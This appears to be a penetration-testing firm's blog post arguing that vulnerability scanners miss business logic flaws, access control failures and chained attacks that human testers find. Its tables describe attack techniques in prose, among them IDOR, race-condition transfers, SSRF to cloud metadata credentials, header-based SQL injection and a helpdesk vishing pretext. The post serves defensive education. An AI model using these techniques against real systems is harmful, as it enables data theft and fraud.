Penetration Testing

Why Automated Tools Are Not Enough

> nessus --scan && echo 'done' # (it's not done)_

Peter Bassill 15 April 2025 14 min read
penetration testing vulnerability scanning automation manual testing methodology

Same application. Two approaches. Wildly different results.

We ran an experiment. We took a real client's customer portal — with their permission — and pointed three leading commercial vulnerability scanners at it. We let them run to completion, collected every finding, deduplicated the results, and compiled a consolidated report. The scanners found 23 issues: some missing security headers, a couple of outdated JavaScript libraries, a cross-site scripting (XSS) vulnerability in a search field, and a selection of informational findings about cookie flags and TLS configuration.

Then a human tester spent the same amount of time — five days — manually testing the same application. They found 11 issues. Fewer by count. But among them: an insecure direct object reference (IDOR) that exposed every customer's invoices by incrementing an ID parameter, a business logic flaw allowing negative quantities that credited money to user accounts, a broken access control that allowed any authenticated user to access the admin dashboard by navigating directly to its URL, and a chained attack that combined the admin access with an unrestricted file upload to achieve remote code execution on the underlying server.

The scanners found 23 issues rated informational to medium. The human found 11 issues, four of which were critical — and one of which constituted a full server compromise. Not a single one of the human's critical findings appeared in the scanner output.

This isn't a failing of the scanners. They did exactly what they were designed to do: identify known vulnerability patterns through automated pattern matching. The problem is that the vulnerabilities which actually lead to breaches — the ones that let attackers steal data, move laterally, and deploy ransomware — almost never match a pattern a scanner recognises.

The Numbers Trap

A scanner report with 200 findings looks more comprehensive than a manual report with 15 findings. It isn't. The scanner has found 200 instances of problems it was designed to look for. The human has found 15 problems that exist in reality — and the 4 that matter most aren't in the scanner's vocabulary.


Automation has a genuine role.

This isn't an argument against scanners. Automated tools are essential components of a mature security programme. They do things that humans can't do efficiently, and they do them at a scale that manual testing can't match.

Strength What It Means in Practice
Speed and scale A scanner can assess thousands of hosts in the time it takes a human to test one application. For broad-baseline coverage across a large estate — identifying missing patches, expired certificates, and known CVEs — automation is unmatched.
Consistency A scanner runs the same checks every time, in the same order, with the same thoroughness. It doesn't have bad days, doesn't get distracted, and doesn't skip checks because it's running short on time. For repeatable, auditable baseline assessments, this consistency is invaluable.
Known vulnerability detection If a vulnerability has a CVE number and a detection signature, a well-maintained scanner will find it reliably. For patch management validation — confirming that known vulnerabilities have been remediated — scanners are the right tool.
Frequency Scanners can run weekly, daily, or continuously. Human pen tests happen annually or quarterly at best. For catching new vulnerabilities between engagements — a new CVE drops, a certificate expires, a service is misconfigured — automated scanning fills the gap.
Configuration benchmarking Scanners can check hundreds of configuration settings against CIS benchmarks, PCI requirements, or custom baselines in minutes. For compliance evidence and configuration drift detection, automation is ideal.

These are real strengths, and any organisation with more than a handful of systems should be running automated vulnerability scanning as part of its security baseline. The mistake isn't using scanners. The mistake is believing that scanner output is equivalent to a penetration test.


What scanners fundamentally cannot find.

Scanners work through pattern matching. They send predefined inputs, observe the responses, and compare those responses against a database of known vulnerability signatures. This means they can only find vulnerabilities that someone has previously discovered, documented, and written a detection rule for — and only in contexts where the detection rule fires correctly.

Here's what falls outside that paradigm — and why these categories represent the most dangerous vulnerabilities in any environment:

Blind Spot Why Scanners Miss It Real-World Example
Business logic flaws A scanner has no understanding of what an application is supposed to do. It can't recognise when a workflow permits something that shouldn't be possible, because it doesn't know what "shouldn't be possible" means in your business context. An insurance quote system where changing the date of birth after quote generation doesn't recalculate the premium. A user can obtain a quote for a 25-year-old, change the DoB to 80, and purchase insurance at a fraction of the actuarial cost. No technical vulnerability — purely a logic flaw.
Access control failures Testing access control requires understanding the application's permission model — which users should access which resources — and then deliberately violating it. Scanners don't understand roles, permissions, or data ownership. An IDOR where changing /api/users/1001/documents to /api/users/1002/documents returns a different customer's files. The API returns a valid 200 response in both cases — the scanner sees a successful request, not a security failure.
Chained vulnerabilities Scanners assess each finding in isolation. They cannot combine a low-severity information disclosure with a medium-severity SSRF to achieve a critical-severity credential theft. Chaining requires understanding how weaknesses interact — which requires human reasoning. A server-side request forgery (SSRF) in a PDF export function — rated medium in isolation. Combined with the cloud instance metadata service (IMDSv1), it retrieves AWS temporary credentials. Those credentials have S3 read access to the backup bucket. Chain: medium SSRF → critical data breach.
Race conditions Exploiting race conditions requires carefully timed concurrent requests — sending two withdrawal requests simultaneously to exploit a time-of-check-to-time-of-use (TOCTOU) vulnerability. This requires deliberate, context-aware manipulation that automated tools don't attempt. A funds transfer function where two simultaneous requests both pass the balance check before either deducts the funds. Each request transfers £500 from an account with a £500 balance. Result: £1,000 transferred from a £500 account.
Multi-step workflow abuse Scanners interact with individual pages and endpoints. They don't navigate multi-step processes in sequence, skip steps, replay steps out of order, or modify state between steps. Workflow abuse requires understanding the intended process and deliberately breaking it. A payment flow where Step 1 selects items, Step 2 calculates the total, and Step 3 submits payment. Intercepting between Steps 2 and 3 to modify the total to £0.01 while retaining the original items. The payment succeeds because Step 3 doesn't re-validate.
Authentication bypass through design Scanners test login forms with standard credential attacks. They don't examine whether the password reset flow leaks tokens, whether OAuth state parameters are validated, whether MFA can be bypassed through API calls that skip the front-end, or whether session tokens are predictable. A password reset endpoint that returns the reset token in the API response body (not just in the email). Any user can request a reset for any account and intercept the token from the response, resetting the target's password without access to their email.
Context-dependent injection Scanners test for SQL injection by sending standard payloads to standard input fields. They miss injection in unconventional locations — HTTP headers, JSON values, serialised objects, file upload metadata, WebSocket frames — where the same payloads behave differently. SQL injection via a custom HTTP header (X-Forwarded-For) that the application logs to a database without sanitisation. The scanner tested every form field but never tested the headers — because headers aren't "input fields" in the scanner's model.
Social engineering susceptibility No scanner can phone your helpdesk and convince them to reset a password. No scanner can assess whether your staff would click a phishing link, hold a door open for a stranger, or plug in a USB drive found in the car park. The attacker doesn't need a technical vulnerability at all. A convincing phone call to the helpdesk — "Hi, it's James from the Edinburgh office, I've been locked out" — results in a password reset. The helpdesk agent follows the process they were trained on, which doesn't require caller verification.

What a skilled tester actually does.

The value of a human tester isn't that they run better tools. It's that they think. They read the application, understand what it does, form hypotheses about what could go wrong, and test those hypotheses with creativity and persistence. This cognitive process — adversarial reasoning — is what separates a penetration test from a vulnerability scan.

Human Capability What It Looks Like in Practice
Understanding intent The tester reads the application and understands what it's supposed to do: "this is a portal where customers view their invoices." From that understanding, they derive what shouldn't be possible: "a customer should not be able to view another customer's invoices." They then test specifically for that violation.
Creative hypothesis "What happens if I submit a negative quantity? What if I change my role in the JWT? What if I replay a payment request with a modified amount? What if I upload a PHP file with a .jpg extension?" Each of these is a hypothesis that no scanner would generate — because each requires contextual understanding of the application.
Chaining and escalation The tester finds a low-severity information disclosure: an error message reveals an internal IP address. They find a medium-severity SSRF. They combine them: the SSRF, directed at the internal IP, reaches an unauthenticated admin panel. Individually, minor. Combined, critical. The tester sees the chain because they hold the whole picture in their head.
Adversarial persistence A scanner tries a payload, gets a negative result, and moves to the next check. A human tester who suspects a vulnerability is present tries again with different encoding, different context, different timing. They adjust their approach based on the application's behaviour — learning from each response.
Contextual risk assessment A scanner rates a finding by CVSS — a generic severity score. A human tester rates it by business impact: "this XSS is stored in the support ticket field. When an admin views the ticket, the attacker's JavaScript runs in the admin's browser, stealing their session. This turns a medium-severity XSS into admin account takeover."
Narrative reporting A scanner produces a list of findings. A human tester produces an attack story: "starting from an unauthenticated internet position, we chained three vulnerabilities to achieve remote code execution on the production database server within four hours." One goes into a remediation tracker. The other goes to the board.

The same application, two lenses.

To make the distinction concrete, here's what the same customer portal looks like through the lens of an automated scanner versus a human tester.

Finding Scanner Assessment Human Tester Assessment
Missing X-Frame-Options header Medium — "The application may be vulnerable to clickjacking." Low — "The application uses CSP frame-ancestors 'none' which provides equivalent protection. The missing X-Frame-Options header is a defence-in-depth gap for legacy browsers only."
jQuery 3.4.1 (outdated) Medium — "Known vulnerabilities exist in this version of jQuery (CVE-2020-11022)." Informational — "The CVE requires a specific DOM manipulation pattern that this application doesn't use. The library is outdated and should be updated as maintenance hygiene, but the specific CVE is not exploitable in this context."
Invoice endpoint accepts id parameter Not detected — the scanner received a valid 200 response and moved on. Critical — "Changing /api/invoices/1001 to /api/invoices/1002 returns a different customer's invoice. No authorisation check is performed on the id parameter. All 43,000 customer invoices are accessible to any authenticated user."
Admin dashboard at /admin Not detected — the scanner crawled from the user context and never discovered the admin URL. Critical — "Navigating directly to /admin while authenticated as a standard user grants full administrative access. The application checks authentication but not authorisation for the admin interface."
Negative quantity in order form Not detected — the scanner doesn't test business logic. High — "Submitting a quantity of -1 for a product credits £49.99 to the user's account. Repeated exploitation allows unlimited credit generation. The application validates that the quantity field is an integer but not that it's positive."

The scanner correctly identified two real issues (the header and the outdated library) — but overrated both. The human correctly identified three critical issues the scanner couldn't detect and provided accurate context that reduced the severity of the scanner's findings. The net result: the scanner report suggests moderate risk; the human report reveals the application is critically compromised.


When scanning replaces testing.

The most dangerous consequence of treating vulnerability scanning as penetration testing isn't the missed findings — it's the false confidence those missed findings create.

"We've Been Pen Tested"
An organisation receives a scanner report labelled as a penetration test. It shows no critical findings. The board receives assurance that the security posture is acceptable. But the report didn't test business logic, access controls, or chained attacks — because no human looked at the application. The organisation believes it's been tested. It hasn't.
"Our Risk Is Decreasing"
Quarterly scanner reports show fewer findings each quarter — patch management is improving, security headers are being deployed, SSL/TLS is being hardened. The trend line looks positive. But the business logic flaw that allows any user to access any other user's data has been present since launch and will never appear in a scanner report.
"We Meet the Compliance Requirement"
The contract says "annual penetration test required." A scanner report satisfies the letter of the requirement. But when a breach occurs through a vulnerability the scanner couldn't find, the question won't be whether the contract was technically satisfied — it will be whether reasonable security measures were in place.
"We Can't Justify the Cost"
A vulnerability scan costs a fraction of a manual pen test. The output looks similar — both produce reports with findings and severity ratings. The difference only becomes visible when the manual test finds the critical issues the scanner missed, or when a breach exploits a vulnerability that was never in a scanner's database.

Using automation and human testing together.

The choice isn't between scanners and testers. It's about understanding what each does and deploying them in combination so that each covers the other's weaknesses.

Activity Frequency What It Covers What It Misses
Automated vulnerability scanning Weekly or continuous Known CVEs, missing patches, misconfigurations, expired certificates, security header compliance, SSL/TLS issues Business logic, access control, chained attacks, novel vulnerabilities, social engineering, anything requiring context
Manual penetration testing Annual or before major releases Business logic flaws, access control failures, attack chain development, novel vulnerability discovery, contextual risk assessment Breadth — a human can't assess 10,000 hosts in five days. Continuous coverage between engagements.
DAST (Dynamic Application Security Testing) Per deployment (CI/CD integrated) Common web vulnerability patterns (XSS, SQLi, CSRF) caught early in the development lifecycle, before production deployment Same limitations as scanning — pattern-matching only. No business context. High false positive rate without tuning.
Bug bounty programme Continuous Creative, human-driven testing at scale. Diverse perspectives. Finds issues that internal testing may miss. Not systematic — researchers focus on high-reward findings. No guaranteed coverage of all functionality. Requires maturity to manage.
A Layered Testing Programme
# Continuous — automated baseline
vuln_scan --frequency=weekly --scope=all_assets # Known CVEs, misconfig
dast_scan --trigger=deployment --scope=web_apps # Pre-production checks
asm_monitor --frequency=daily --alert=new_asset # Attack surface changes

# Periodic — human-led depth
pen_test --frequency=annual --scope=risk_based # Full manual assessment
app_test --trigger=major_release --scope=changed_app # Pre-launch testing
social_eng --frequency=biannual --scope=all_staff # Phishing + vishing

# Event-driven — as needed
retest --trigger=remediation_complete # Verify fixes
red_team --trigger=maturity_milestone # Full adversary simulation
incident_test --trigger=post_breach # After a security incident

The automated layer runs continuously, catching known issues as they appear. The human layer runs periodically, finding the issues that automation can't. Neither replaces the other. Together, they provide coverage that neither achieves alone.


How to tell if your "pen test" is actually just a scan.

Some providers sell vulnerability scans as penetration tests — sometimes knowingly, sometimes through ignorance. The pricing is lower, the turnaround is faster, and the report looks superficially similar. Here's how to distinguish between them.

Indicator Likely a Scan Likely a Pen Test
Turnaround time Report delivered within 24–48 hours of "testing" Testing takes 5–10 business days. Report delivered 3–5 days after testing completes.
Findings format Every finding has the same structure: tool-generated title, generic description, CVSS score, boilerplate remediation. Often references Nessus, Qualys, or Burp plugin IDs. Findings are written in prose, with context specific to the application. Attack chains are described as narratives. Remediation is tailored to the client's stack.
Evidence Screenshots of scanner output. HTTP request/response pairs that look automated. Screenshots of manual exploitation. Step-by-step walkthrough of the attack path. Evidence of the tester interacting with the application in ways a scanner wouldn't.
Business logic No business logic findings. No access control testing. No workflow abuse. Business logic flaws described and demonstrated. IDOR, privilege escalation, and workflow abuse findings with clear impact statements.
Tester interaction No contact during testing. No questions about the application's functionality. Tester asks questions: "What's this admin panel supposed to do?" "Which users should access this data?" "Is this test payment functionality live?"
Pricing Significantly below market rate for the scope. Priced per IP or per host rather than per tester-day. Priced by tester-days appropriate to the scope. A complex web application requires 5–10 days; if the quote suggests less, the testing won't be thorough.
Debrief No debrief offered, or a brief call that amounts to "here's the report." A structured debrief walkthrough with the tester who conducted the work. Questions answered. Attack chains explained. Remediation discussed.

The Question That Reveals Everything

Ask your provider: "Can you describe a business logic vulnerability you found in a previous engagement?" If they can tell you a specific story — the application, the flaw, how they found it, the impact — they're doing manual testing. If they can't, or if they redirect to talking about CVEs and CVSS scores, they're running scanners.


Why manual testing is worth the investment.

Manual penetration testing costs more than automated scanning. That's a fact. A typical web application scan might cost £500–£1,500. A manual pen test of the same application might cost £5,000–£15,000. The question is whether the difference in price reflects a difference in value — and the answer is unambiguously yes.

Cost Comparison Vulnerability Scan Manual Pen Test
Typical cost £500–£1,500 per application £5,000–£15,000 per application
Critical findings discovered Known CVEs only — typically infrastructure-level Business logic, access control, chained attacks, novel vulnerabilities — typically application-level
Average data breach cost (UK) £3.4 million (IBM Cost of a Data Breach Report 2024)
Return on investment Finds the vulnerabilities a scanner can find. Misses the ones that lead to breaches. A single critical finding that prevents a breach pays for decades of annual pen testing.

The IDOR vulnerability from our opening experiment exposed 43,000 customer invoices. Had an attacker found it first, the resulting breach notification, regulatory investigation, legal costs, and reputational damage would have dwarfed the cost of every pen test the organisation will ever commission. The scan missed it. The human found it. That's the economics in one sentence.


The bottom line.

Automated vulnerability scanners are fast, consistent, and essential for maintaining a security baseline. They find known vulnerabilities at scale and should run continuously as part of any mature security programme.

But they cannot understand your application. They cannot think like an attacker. They cannot chain findings, test business logic, bypass access controls through creative manipulation, or assess the real-world impact of what they find. The vulnerabilities that lead to breaches — the IDORs, the logic flaws, the chained attacks, the authentication bypasses — live in the space between what a scanner can detect and what a skilled human tester can discover.

Use both. Run scanners continuously. Commission manual testing periodically. And never mistake one for the other — because the organisation that believes a scan is a pen test is the organisation that learns the difference during a breach.


Testing that finds what automation misses.

Every engagement is led by experienced human testers who think adversarially, test creatively, and report contextually. Automated tools support the process — they don't replace it.